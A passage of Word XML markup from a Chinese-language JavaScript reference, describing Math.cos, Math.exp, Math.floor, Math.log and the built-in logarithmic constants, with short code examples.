    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="687" w:name="Math_cos__"/>
      <w:r>
        <w:t>Math.cos()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="687"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计算余弦值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.cos(x)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一个以弧度制度量的角度。如果想将角度制转为弧度制，可以将角度制的值乘以</w:t>
      </w:r>
      <w:r>
        <w:t>0.017 453 293(2π/360)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定值</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的余弦值。返回值将介于</w:t>
      </w:r>
      <w:r>
        <w:t>-1.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="688" w:name="Math_E"/>
      <w:r>
        <w:t>Math.E</w:t>
      </w:r>
      <w:bookmarkEnd w:id="688"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常数</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.E</w:t>
      </w:r>
      <w:r>
        <w:t>是数学常数</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>，自然对数的底数，近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>2.718 28</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="689" w:name="Math_exp__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.exp()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.exp(x)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用做指数的数值或表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>次方，</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>为自然对数的底数，近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>2.718 28</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="690" w:name="Math_floor__"/>
      <w:r>
        <w:t>Math.floor()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对一个数字向下取整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.floor(x)</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x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意数值或表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最接近并且小于或等于</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.floor()</w:t>
      </w:r>
      <w:r>
        <w:t>执行向下取整操作；换句话说，它返回最接近并且小于或等于函数参数的整数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.floor()</w:t>
      </w:r>
      <w:r>
        <w:t>将一个浮点数向下取整到最接近的整数。它与</w:t>
      </w:r>
      <w:r>
        <w:t>Math.round()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，后者会向上或向下取整到最接近的整数。也要注意</w:t>
      </w:r>
      <w:r>
        <w:t>Math.floor()</w:t>
      </w:r>
      <w:r>
        <w:t>对负数也向下（就是说，数字将更小）取整，而不是向上（更靠近</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=Math.floor(1.99);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=Math.floor(1.01);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c=Math.floor(1.0);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d=Math.floor(-1.01);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>-2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="691" w:name="Math_LN10"/>
      <w:r>
        <w:t>Math.LN10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="691"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数学常数</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>（即</w:t>
      </w:r>
      <w:r>
        <w:t>ln1</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LN10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LN10</w:t>
      </w:r>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数。这个常量的近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>2.302 585 092 994 045 901 1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="692" w:name="Math_LN2"/>
      <w:r>
        <w:t>Math.LN2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="692"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LN2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LN2</w:t>
      </w:r>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数。这个常量的近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>0.693 147 180 559 945 286 23</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="693" w:name="Math_log__"/>
      <w:r>
        <w:t>Math.log()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="693"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算自然对数</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Math.log(x)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任何大于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的数值或表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.log()</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，它的参数的自然对数。参数必须大于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以按下面的公式计算以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>为底或以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>为底的对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251745280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="1130060" cy="340743"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="86" name="00086.jpeg" descr="00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6.jpeg" descr="00086.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1130060" cy="340743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个公式可翻译为下面的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function log10(x){return Math.LOG10E*Math.log(x);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function log2(x){return Math.LOG2E*Math.log(x);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="694" w:name="Math_LOG10E"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.LOG10E</w:t>
      </w:r>
      <w:bookmarkEnd w:id="694"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG10E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG10E</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的值，即</w:t>
      </w:r>
      <w:r>
        <w:t>常数</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>为底的对数。它的近似值为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0.434 294 481 903 251 816 67.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="695" w:name="Math_LOG2E"/>
      <w:r>
        <w:t>Math.LOG2E</w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG2E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG2E</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
